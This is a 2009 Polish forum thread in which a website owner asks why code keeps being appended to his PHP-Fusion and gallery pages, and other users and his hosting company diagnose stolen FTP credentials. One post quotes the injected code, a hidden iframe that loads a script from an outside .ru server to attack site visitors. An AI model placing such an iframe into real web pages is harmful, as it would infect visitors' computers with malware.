FORUM PTT -

KOMPUTER - Trojan na stronie
Tata Muminka - 01-07-2009, 23:17
: Temat postu: Trojan na stronie
Nie wiem dlaczego ale do plików na serwie dopisuje mi sie kod. Zmieniłem hasła i dalej to samo. Juz wywalałem portal kilka razy. Dopisuje sie on do index. Tak samo mam na galerii. Jak temu zaradzić?
Lukas Do'Urden - 02-07-2009, 01:21
:
Jak wygląda ten kod? Wklej ten fragment jak możesz. Czy to się dopisuje przy nazwie pliku, czy w środku? Jaki to serwer? Sama zmiana hasła nic nie da,jeśli na serwie wciąż gdzieś ukryty złośliwy program.
Tata Muminka - 02-07-2009, 11:22
:
Cytat:
<iframe src="http://a3h.ru:8080/ts/in.cgi?pepsi82" width=125 height=125 style="visibility: hidden"></iframe>


Serwer firmy cal.pl.

Dopisuje sie on na końcu plików index.php, news.php. Takie coś jest nie tylko na fussion ale także na 4images i Coppermine Photo Gallery.
Tata Muminka - 02-07-2009, 11:44
:
Odpowiedź z cal.pl

Witamy serdecznie,

Cytat:
Proszę przeskanować komputer programem antywirusowym, zaktualizować system Windows oraz program Total Commander. Wirusy są wgrywane w sposób taki, że po połączeniu z serwerem FTP jest przechwytywany login i hasło do serwera, z którym się Pan połączył. Kolejnie są dogrywane z niezależnego serwera złośliwe kody do plików. Po aktualizacji systemu i pozbycia się wszelkich wirusów proszę zmienić hasło do serwera ( http://pomoc.cal.pl/conte...-logowa%F1.html ). Nie jest to błąd serwera, a oprogramowania z którego Pan korzysta. Zachęcam także do zapoznania się z dokumentami i publikacjami dostępnymi w Internecie na temat tego rodzaju wirusów - jest ich mnóstwo - www.google.pl.


mea culpa :)
PTram - 02-07-2009, 11:59
:
Mieliśmy to samo. Przestaliśmy używać Total Commandera, zmieniliśmy hasła i jak na razie jest spokój. Obecnie używamy File Zilli. Total Commander ma dużo dziur.
Tata Muminka - 02-07-2009, 12:14
:
Thx. Albo używanie IE do FTP.